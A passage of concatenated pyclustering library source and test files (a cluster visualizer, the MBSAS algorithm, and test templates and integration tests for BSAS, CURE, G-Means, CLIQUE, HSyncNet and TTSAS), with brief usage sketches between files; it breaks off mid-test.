if len(filename) == 0:
raise ValueError("Impossible to save visualization to file: empty file path is specified.")
invisible_axis = kwargs.get('invisible_axis', True)
visible_grid = kwargs.get('visible_grid', True)
self.show(None, invisible_axis, visible_grid, False)
plt.savefig(filename)
@staticmethod
def close(figure):
"""!
@brief Closes figure object that was used or allocated by the visualizer.
@param[in] figure (figure): Figure object that was used or allocated by the visualizer.
"""
plt.close(figure)
def show(self, figure=None, invisible_axis=True, visible_grid=True, display=True, shift=None):
"""!
@brief Shows clusters (visualize) on created or existed figure.
@details The class is not responsible for figures that are used for visualization; they should be closed using
the `close()` method of this visualizer.
@param[in] figure (fig): Defines requirement to use specified figure, if None - new figure is created for drawing clusters.
@param[in] invisible_axis (bool): Defines visibility of axes on each canvas, if True - axes are invisible.
@param[in] visible_grid (bool): Defines visibility of grid on each canvas, if True - grid is displayed.
@param[in] display (bool): Defines requirement to display clusters on a stage, if True - clusters are displayed,
if False - plt.show() should be called by the user.
@param[in] shift (uint): Force canvas shift value - defines canvas index from which clusters should be visualized.
@return (fig) Figure where clusters are shown.
"""
canvas_shift = shift
if canvas_shift is None:
if figure is not None:
canvas_shift = len(figure.get_axes())
else:
canvas_shift = 0
if figure is not None:
cluster_figure = figure
else:
cluster_figure = plt.figure()
maximum_cols = self.__size_row
maximum_rows = math.ceil((self.__number_canvases + canvas_shift) / maximum_cols)
grid_spec = gridspec.GridSpec(maximum_rows, maximum_cols)
for index_canvas in range(len(self.__canvas_clusters)):
canvas_data = self.__canvas_clusters[index_canvas]
if len(canvas_data) == 0:
continue
dimension = self.__canvas_dimensions[index_canvas]
#ax = axes[real_index];
if (dimension == 1) or (dimension == 2):
ax = cluster_figure.add_subplot(grid_spec[index_canvas + canvas_shift])
else:
ax = cluster_figure.add_subplot(grid_spec[index_canvas + canvas_shift], projection='3d')
if len(canvas_data) == 0:
plt.setp(ax, visible=False)
for cluster_descr in canvas_data:
self.__draw_canvas_cluster(ax, dimension, cluster_descr)
for attribute_descr in cluster_descr.attributes:
self.__draw_canvas_cluster(ax, dimension, attribute_descr)
if invisible_axis is True:
ax.xaxis.set_ticklabels([])
ax.yaxis.set_ticklabels([])
if dimension == 3:
ax.zaxis.set_ticklabels([])
if self.__canvas_titles[index_canvas] is not None:
ax.set_title(self.__canvas_titles[index_canvas])
ax.grid(visible_grid)
if display is True:
plt.show()
return cluster_figure
def __draw_canvas_cluster(self, ax, dimension, cluster_descr):
"""!
@brief Draw canvas cluster descriptor.
@param[in] ax (Axis): Axis of the canvas where canvas cluster descriptor should be displayed.
@param[in] dimension (uint): Canvas dimension.
@param[in] cluster_descr (canvas_cluster_descr): Canvas cluster descriptor that should be displayed.
"""
cluster = cluster_descr.cluster
data = cluster_descr.data
marker = cluster_descr.marker
markersize = cluster_descr.markersize
color = cluster_descr.color
for item in cluster:
if dimension == 1:
if data is None:
ax.plot(item[0], 0.0, color=color, marker=marker, markersize=markersize)
else:
ax.plot(data[item][0], 0.0, color=color, marker=marker, markersize=markersize)
elif dimension == 2:
if data is None:
ax.plot(item[0], item[1], color=color, marker=marker, markersize=markersize)
else:
ax.plot(data[item][0], data[item][1], color=color, marker=marker, markersize=markersize)
elif dimension == 3:
if data is None:
ax.scatter(item[0], item[1], item[2], c=color, marker=marker, s=markersize)
else:
ax.scatter(data[item][0], data[item][1], data[item][2], c=color, marker=marker, s=markersize)
```
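The `append_cluster_attribute` method above is documented but never demonstrated in this file. Here is a small sketch that attaches hand-computed center points (hypothetical values, chosen for illustration) to two clusters so they are drawn in each cluster's own color with a distinct marker:
```python
from pyclustering.cluster import cluster_visualizer

data = [[1.0, 1.0], [1.2, 0.9], [0.9, 1.1], [5.0, 5.0], [5.1, 4.9]]
clusters = [[0, 1, 2], [3, 4]]

visualizer = cluster_visualizer()
# append_cluster returns the index of the cluster descriptor on the canvas.
index_first = visualizer.append_cluster(clusters[0], data)
index_second = visualizer.append_cluster(clusters[1], data)

# Attach the (hand-computed) centers as attributes of each cluster.
visualizer.append_cluster_attribute(0, index_first, [[1.03, 1.0]], marker='*', markersize=15)
visualizer.append_cluster_attribute(0, index_second, [[5.05, 4.95]], marker='*', markersize=15)
visualizer.show()
```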
#### File: pyclustering/cluster/mbsas.py
```python
from pyclustering.core.mbsas_wrapper import mbsas as mbsas_wrapper
from pyclustering.core.metric_wrapper import metric_wrapper
from pyclustering.cluster.bsas import bsas
class mbsas(bsas):
"""!
@brief Class represents MBSAS (Modified Basic Sequential Algorithmic Scheme).
@details The interface of the MBSAS algorithm is the same as for BSAS. This algorithm performs clustering in two steps.
The first is the determination of the number of clusters. The second is the assignment of points that were not
marked as cluster representatives to clusters.
Code example of MBSAS usage:
@code
from pyclustering.cluster.bsas import bsas_visualizer
from pyclustering.cluster.mbsas import mbsas
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import SIMPLE_SAMPLES
# Read data sample from 'Simple02.data'.
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
# Prepare algorithm's parameters.
max_clusters = 3
threshold = 1.0
# Create instance of MBSAS algorithm.
mbsas_instance = mbsas(sample, max_clusters, threshold)
mbsas_instance.process()
# Get clustering results.
clusters = mbsas_instance.get_clusters()
representatives = mbsas_instance.get_representatives()
# Display results.
bsas_visualizer.show_clusters(sample, clusters, representatives)
@endcode
@see pyclustering.cluster.bsas, pyclustering.cluster.ttsas
"""
def __init__(self, data, maximum_clusters, threshold, ccore=True, **kwargs):
"""!
@brief Creates MBSAS algorithm.
@param[in] data (list): Input data that is presented as list of points (objects), each point should be represented by list or tuple.
@param[in] maximum_clusters: Maximum allowable number of clusters that can be allocated during processing.
@param[in] threshold: Threshold of dissimilarity (maximum distance) between points.
@param[in] ccore (bool): If True then CCORE (the C++ implementation) will be used for processing.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: 'metric').
<b>Keyword Args:</b><br>
- metric (distance_metric): Metric that is used for distance calculation between two points.
"""
super().__init__(data, maximum_clusters, threshold, ccore, **kwargs)
def process(self):
"""!
@brief Performs cluster analysis in line with MBSAS algorithm.
@return (mbsas) Returns itself (MBSAS instance).
@see get_clusters()
@see get_representatives()
"""
if self._ccore is True:
self.__process_by_ccore()
else:
self.__process_by_python()
return self
def __process_by_ccore(self):
ccore_metric = metric_wrapper.create_instance(self._metric)
self._clusters, self._representatives = mbsas_wrapper(self._data, self._amount, self._threshold, ccore_metric.get_pointer())
def __process_by_python(self):
self._clusters.append([0])
self._representatives.append(self._data[0])
skipped_objects = []
for i in range(1, len(self._data)):
point = self._data[i]
index_cluster, distance = self._find_nearest_cluster(point)
if (distance > self._threshold) and (len(self._clusters) < self._amount):
self._representatives.append(point)
self._clusters.append([i])
else:
skipped_objects.append(i)
for i in skipped_objects:
point = self._data[i]
index_cluster, _ = self._find_nearest_cluster(point)
self._clusters[index_cluster].append(i)
self._update_representative(index_cluster, point)
```
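Since the constructor above forwards a 'metric' keyword argument to BSAS, clustering with a non-default distance can be sketched as follows; the use of the Manhattan metric is an assumption based on pyclustering's `type_metric` enumeration seen elsewhere in this document:
```python
from pyclustering.cluster.mbsas import mbsas
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.utils import read_sample
from pyclustering.utils.metric import distance_metric, type_metric

sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
# At most 3 clusters, dissimilarity threshold 1.0, Manhattan distance.
mbsas_instance = mbsas(sample, 3, 1.0, metric=distance_metric(type_metric.MANHATTAN))
mbsas_instance.process()
print(mbsas_instance.get_clusters())
print(mbsas_instance.get_representatives())
```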
#### File: cluster/tests/bsas_templates.py
```python
import matplotlib;
matplotlib.use('Agg');
from pyclustering.tests.assertion import assertion;
from pyclustering.cluster.bsas import bsas, bsas_visualizer;
from pyclustering.utils import read_sample;
from pyclustering.utils.metric import type_metric, distance_metric;
class bsas_test_template:
@staticmethod
def clustering(path, amount, threshold, expected, ccore, **kwargs):
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN));
sample = read_sample(path);
bsas_instance = bsas(sample, amount, threshold, ccore=ccore, metric=metric);
bsas_instance.process();
clusters = bsas_instance.get_clusters();
representatives = bsas_instance.get_representatives();
obtained_length = 0;
obtained_cluster_length = [];
for cluster in clusters:
obtained_length += len(cluster);
obtained_cluster_length.append(len(cluster));
assertion.eq(len(sample), obtained_length);
assertion.eq(len(expected), len(clusters));
assertion.eq(len(expected), len(representatives));
assertion.ge(amount, len(clusters));
dimension = len(sample[0]);
for rep in representatives:
assertion.eq(dimension, len(rep));
expected.sort();
obtained_cluster_length.sort();
assertion.eq(expected, obtained_cluster_length);
@staticmethod
def visualizing(path, amount, threshold, ccore):
sample = read_sample(path);
bsas_instance = bsas(sample, amount, threshold, ccore=ccore);
bsas_instance.process();
bsas_visualizer.show_clusters(sample, bsas_instance.get_clusters(), bsas_instance.get_representatives());
```
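A unit test built on this template might look like the sketch below; the threshold and expected cluster sizes are illustrative assumptions, not verified expectations:
```python
import unittest
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.cluster.tests.bsas_templates import bsas_test_template

class bsas_unit_test_sketch(unittest.TestCase):
    def test_clustering_sample_simple1(self):
        # 2 clusters, threshold 1.0, expected sizes [5, 5], Python implementation.
        bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0, [5, 5], False)
```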
#### File: cluster/tests/cure_templates.py
```python
import numpy
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.utils import read_sample
from pyclustering.cluster.cure import cure
from pyclustering.cluster.encoder import type_encoding, cluster_encoder
from pyclustering.tests.assertion import assertion
from random import random
class CureTestTemplates:
@staticmethod
def template_cluster_allocation(input_data, cluster_sizes, number_cluster, number_represent_points = 5, compression = 0.5, ccore_flag = False, **kwargs):
if isinstance(input_data, str):
sample = read_sample(input_data)
else:
sample = input_data
numpy_usage = kwargs.get('numpy_usage', False)
if numpy_usage is True:
sample = numpy.array(sample)
cure_instance = cure(sample, number_cluster, number_represent_points, compression, ccore = ccore_flag)
cure_instance.process()
clusters = cure_instance.get_clusters()
representors = cure_instance.get_representors()
means = cure_instance.get_means()
assertion.eq(len(clusters), number_cluster)
assertion.eq(len(representors), number_cluster)
assertion.eq(len(means), number_cluster)
obtained_cluster_sizes = [len(cluster) for cluster in clusters]
total_length = sum(obtained_cluster_sizes)
assertion.eq(total_length, len(sample))
cluster_sizes.sort()
obtained_cluster_sizes.sort()
assertion.eq(cluster_sizes, obtained_cluster_sizes)
@staticmethod
def templateClusterAllocationOneDimensionData(ccore_flag):
input_data = [ [random()] for _ in range(10) ] + [ [random() + 3] for _ in range(10) ] + [ [random() + 5] for _ in range(10) ] + [ [random() + 8] for _ in range(10) ]
cure_instance = cure(input_data, 4, ccore = ccore_flag)
cure_instance.process()
clusters = cure_instance.get_clusters()
assertion.eq(4, len(clusters))
for cluster in clusters:
assertion.eq(10, len(cluster))
@staticmethod
def templateEncoderProcedures(ccore_flag):
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
cure_instance = cure(sample, 4, 5, 0.5, ccore = ccore_flag)
cure_instance.process()
clusters = cure_instance.get_clusters()
encoding = cure_instance.get_cluster_encoding()
encoder = cluster_encoder(encoding, clusters, sample)
encoder.set_encoding(type_encoding.CLUSTER_INDEX_LABELING)
encoder.set_encoding(type_encoding.CLUSTER_OBJECT_LIST_SEPARATION)
encoder.set_encoding(type_encoding.CLUSTER_INDEX_LIST_SEPARATION)
assertion.eq(4, len(clusters))
@staticmethod
def exception(type, input_data, number_cluster, number_represent_points, compression, ccore_flag):
try:
if isinstance(input_data, str):
sample = read_sample(input_data)
else:
sample = input_data
cure_instance = cure(sample, number_cluster, number_represent_points, compression, ccore=ccore_flag)
cure_instance.process()
except type:
return
except Exception as ex:
raise AssertionError("Expected: '%s', Actual: '%s'" % (type, type(ex).__name__))
raise AssertionError("Expected: '%s', Actual: 'None'" % type)
```
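The `exception` helper above asserts that CURE raises a specific error type. A sketch of its intended use, assuming `cure` raises `ValueError` for empty input data (an assumption, not verified here):
```python
from pyclustering.cluster.tests.cure_templates import CureTestTemplates

# Expect a ValueError when CURE is constructed with empty input data
# (hypothetical scenario for illustration).
CureTestTemplates.exception(ValueError, [], 1, 5, 0.5, False)
```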
#### File: cluster/tests/gmeans_templates.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.samples import answer_reader
from pyclustering.cluster.gmeans import gmeans
from pyclustering.utils import read_sample
class gmeans_test_template(unittest.TestCase):
def clustering(self, sample_path, answer, amount, ccore, **kwargs):
attempts = 10
failures = ""
k_max = kwargs.get('k_max', -1)
random_state = kwargs.get('random_state', None)
data = read_sample(sample_path)
if isinstance(answer, str):
reader = answer_reader(answer)
expected_length_clusters = sorted(reader.get_cluster_lengths())
amount_clusters = len(expected_length_clusters)
elif isinstance(answer, int):
expected_length_clusters = None
amount_clusters = answer
else:
expected_length_clusters = answer
amount_clusters = len(answer)
for _ in range(attempts):
gmeans_instance = gmeans(data, amount, ccore, k_max=k_max, random_state=random_state).process()
clusters = gmeans_instance.get_clusters()
centers = gmeans_instance.get_centers()
wce = gmeans_instance.get_total_wce()
self.assertEqual(amount_clusters, len(centers))
if len(clusters) > 1:
self.assertGreater(wce, 0.0)
else:
self.assertGreaterEqual(wce, 0.0)
if len(clusters) != amount_clusters:
failures += "1. %d != %d\n" % (len(clusters), amount_clusters)
continue
unique_indexes = set()
for cluster in clusters:
for index_point in cluster:
unique_indexes.add(index_point)
if len(data) != len(unique_indexes):
failures += "2. %d != %d\n" % (len(data), len(unique_indexes))
continue
if expected_length_clusters is None:
return
expected_total_length = sum(expected_length_clusters)
actual_total_length = sum([len(cluster) for cluster in clusters])
if expected_total_length != actual_total_length:
failures += "3. %d != %d\n" % (expected_total_length, actual_total_length)
continue
actual_length_clusters = sorted([len(cluster) for cluster in clusters])
if expected_length_clusters != actual_length_clusters:
failures += "4. %s != %s\n" % (str(expected_length_clusters), str(actual_length_clusters))
continue
return
self.fail("Expected result is not obtained during %d attempts: %s\n" % (attempts, failures))
```
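A concrete test case built on this template might look like the sketch below; the expected cluster sizes and the fixed random state are illustrative assumptions:
```python
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.cluster.tests.gmeans_templates import gmeans_test_template

class gmeans_unit_test_sketch(gmeans_test_template):
    def test_clustering_sample_simple1(self):
        # Start the search from 1 cluster; expect two clusters of 5 points each.
        self.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [5, 5], 1, False, random_state=1000)
```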
#### File: cluster/tests/__init__.py
```python
from pyclustering.tests.suite_holder import suite_holder
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.tests.integration import clustering_integration_tests
from pyclustering.cluster.tests.unit import clustering_unit_tests
class clustering_tests(suite_holder):
def __init__(self):
super().__init__()
clustering_integration_tests.fill_suite(self.get_suite())
clustering_unit_tests.fill_suite(self.get_suite())
@staticmethod
def fill_suite(cluster_suite):
clustering_integration_tests.fill_suite(cluster_suite)
clustering_unit_tests.fill_suite(cluster_suite)
```
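Assuming `suite_holder.get_suite()` returns a standard `unittest.TestSuite` (as its use above suggests), the collected tests can be run directly; note that the full suite is large and slow:
```python
import unittest
from pyclustering.cluster.tests import clustering_tests

# Collect every registered clustering test (integration + unit) and run it.
suite = clustering_tests().get_suite()
unittest.TextTestRunner(verbosity=2).run(suite)
```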
#### File: tests/integration/it_clique.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.clique import clique
from pyclustering.cluster.tests.clique_templates import clique_test_template
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES
from pyclustering.core.tests import remove_library
from pyclustering.tests.assertion import assertion
class clique_integration_test(unittest.TestCase):
def test_clustering_sample_simple_1_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 8, 0, [5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 7, 0, [5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 6, 0, [5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 5, 0, [5, 5], 0, True)
def test_clustering_sample_simple_1_one_cluster_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 0, [10], 0, True)
def test_clustering_diagonal_blocks_arent_neighbors_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 0, [5, 5], 0, True)
def test_clustering_sample_simple_1_noise_only_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 6, 1000, [], 10, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 6, 10, [], 10, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 5, [], 10, True)
def test_clustering_sample_simple_2_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 7, 0, [5, 8, 10], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 6, 0, [5, 8, 10], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1, 0, [23], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 6, 500, [], 23, True)
def test_clustering_sample_simple_3_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 9, 0, [10, 10, 10, 30], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 8, 0, [10, 10, 10, 30], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1, 0, [60], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 6, 500, [], 60, True)
def test_clustering_sample_simple_3_one_point_noise_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 2, 9, [59], 1, True)
def test_clustering_sample_simple_4_one_cluster_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 1, 0, [75], 0, True)
def test_clustering_sample_simple_5_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 8, 0, [15, 15, 15, 15], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 7, 0, [15, 15, 15, 15], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 6, 0, [15, 15, 15, 15], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 5, 0, [15, 15, 15, 15], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 1, 0, [60], 0, True)
def test_clustering_one_dimensional_data1_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 4, 0, [10, 10], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, 0, [20], 0, True)
def test_clustering_one_dimensional_data2_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, 15, 0, [15, 20, 30, 80], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, 2, 0, [145], 0, True)
def test_clustering_one_dimensional_data_3_similar_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 7, 0, [10, 20], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 2, 0, [30], 0, True)
def test_clustering_sample_simple_10_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 8, 0, [11, 11, 11], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 7, 0, [11, 11, 11], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 2, 0, [33], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 1, 0, [33], 0, True)
def test_clustering_three_dimensional_data1_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 6, 0, [10, 10], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 5, 0, [10, 10], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 1, 0, [20], 0, True)
def test_clustering_similar_points_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 8, 0, [5, 5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 7, 0, [5, 5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 5, 0, [5, 5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 2, 0, [15], 0, True)
def test_clustering_zero_column_by_core(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, 3, 0, [5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, 2, 0, [5, 5], 0, True)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, 1, 0, [10], 0, True)
def test_clustering_fcps_lsun_by_core(self):
clique_test_template.clustering(FCPS_SAMPLES.SAMPLE_LSUN, 15, 0, [100, 101, 202], 0, True)
def test_clustering_fcps_hepta_by_core(self):
clique_test_template.clustering(FCPS_SAMPLES.SAMPLE_HEPTA, 9, 0, [30, 30, 30, 30, 30, 30, 32], 0, True)
def test_visualize_no_failure_one_dimensional_by_core(self):
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 4, 0, True)
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, 7, 0, True)
def test_visualize_no_failure_two_dimensional_by_core(self):
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 8, 0, True)
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 0, True)
def test_visualize_no_failure_three_dimensional_by_core(self):
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 3, 0, True)
def test_high_dimension_data_failure(self):
data = [[0, 1, 2, 1, 3, 4, 5, 1, 2, 3, 3, 1, 3], [0, 1, 0, 1, 3, 8, 5, 5, 3, 3, 3, 0, 0]]
clique_instance = clique(data, 15, 0)
assertion.exception(RuntimeError, clique_instance.process)
def test_processing_when_library_core_removed(self):
self.run_removed_library_core_test()
@remove_library
def run_removed_library_core_test(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 8, 0, [5, 5], 0, True)
```
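For orientation, here is a minimal standalone sketch of the CLIQUE workflow that the template above drives. The constructor arguments mirror the positional order used in the calls (data, grid intervals per dimension, density threshold); the concrete points and values are illustrative only.
```python
from pyclustering.cluster.clique import clique

# Two small, well-separated groups of 2-D points (illustrative data).
data = [[1.0, 1.0], [1.2, 1.1], [0.9, 1.3],
        [5.0, 5.0], [5.1, 4.9], [4.8, 5.2]]

# 8 grid intervals per dimension, density threshold 0 (every non-empty
# cell counts as dense); ccore=False selects the pure-Python backend.
clique_instance = clique(data, 8, 0, ccore=False)
clique_instance.process()

print(clique_instance.get_clusters())  # expected: two clusters of three points
print(clique_instance.get_noise())     # expected: no outliers
```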
#### File: tests/integration/it_hsyncnet.py
```python
import unittest
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.tests.hsyncnet_templates import HsyncnetTestTemplates
from pyclustering.nnet import solve_type
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.core.tests import remove_library
class HsyncnetIntegrationTest(unittest.TestCase):
    def testClusteringSampleSimple1WithoutCollectingByCore(self):
        HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [5, 5], solve_type.FAST, 5, 0.3, False, True)
    def testClusteringSampleSimple1ByCore(self):
        HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [5, 5], solve_type.FAST, 5, 0.3, True, True)
    def testClusteringOneAllocationSampleSimple1ByCore(self):
        HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, [10], solve_type.FAST, 5, 0.3, True, True)
    def testClusteringSampleSimple2ByCore(self):
        HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, [10, 5, 8], solve_type.FAST, 5, 0.2, True, True)
    def testClusteringOneAllocationSampleSimple2ByCore(self):
        HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1, [23], solve_type.FAST, 5, 0.2, True, True)
    def testClusteringOneDimensionDataSampleSimple7ByCore(self):
        HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, [10, 10], solve_type.FAST, 5, 0.3, True, True)
    def testClusteringTheSameData1ByCore(self):
        HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 3, [5, 5, 5], solve_type.FAST, 5, 0.3, True, True)
    def testDynamicLengthCollectingByCore(self):
        HsyncnetTestTemplates.templateDynamicLength(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, None, 5, 0.3, True, True)
    def testDynamicLengthWithoutCollectingByCore(self):
        HsyncnetTestTemplates.templateDynamicLength(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, None, 5, 0.3, False, True)
def testProcessingWhenLibraryCoreRemoved(self):
self.runRemovedLibraryCoreTest()
@remove_library
def runRemovedLibraryCoreTest(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [5, 5], solve_type.FAST, 5, 0.3, False, True)
```
#### File: tests/integration/it_ttsas.py
```python
import unittest
import matplotlib
matplotlib.use('Agg')
from pyclustering.core.tests import remove_library
from pyclustering.cluster.tests.ttsas_template import ttsas_test
from pyclustering.utils.metric import type_metric, distance_metric
from pyclustering.samples.definitions import SIMPLE_SAMPLES
class ttsas_integration_tests(unittest.TestCase):
    def testClusteringSampleSimple1(self):
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1.0, 2.0, [5, 5], True)
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 10.0, 20.0, [10], True)
    def testClusteringSampleSimple1Euclidean(self):
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1.0, 2.0, [5, 5], True, metric=distance_metric(type_metric.EUCLIDEAN))
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 10.0, 20.0, [10], True, metric=distance_metric(type_metric.EUCLIDEAN))
    def testClusteringSampleSimple1EuclideanSquare(self):
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1.0, 2.0, [5, 5], True, metric=distance_metric(type_metric.EUCLIDEAN_SQUARE))
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 10.0, 20.0, [5, 5], True, metric=distance_metric(type_metric.EUCLIDEAN_SQUARE))
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 100.0, 200.0, [10], True, metric=distance_metric(type_metric.EUCLIDEAN_SQUARE))
    def testClusteringSampleSimple1Manhattan(self):
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1.0, 2.0, [5, 5], True, metric=distance_metric(type_metric.MANHATTAN))
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 10.0, 20.0, [10], True, metric=distance_metric(type_metric.MANHATTAN))
    def testClusteringSampleSimple1Chebyshev(self):
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1.0, 2.0, [5, 5], True, metric=distance_metric(type_metric.CHEBYSHEV))
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 10.0, 20.0, [10], True, metric=distance_metric(type_metric.CHEBYSHEV))
    def testClusteringSampleSimple2(self):
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1.0, 2.0, [5, 8, 10], True)
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 10.0, 20.0, [23], True)
    def testClusteringSampleSimple3(self):
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1.0, 2.0, [10, 10, 10, 30], True)
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 10.0, 20.0, [60], True)
    def testOneDimensionalPoints1(self):
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 1.0, 2.0, [10, 10], True)
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 10.0, 20.0, [20], True)
    def testOneDimensionalPoints2(self):
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 1.0, 2.0, [10, 20], True)
        ttsas_test.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 10.0, 20.0, [30], True)
    def testThreeDimensionalPoints(self):
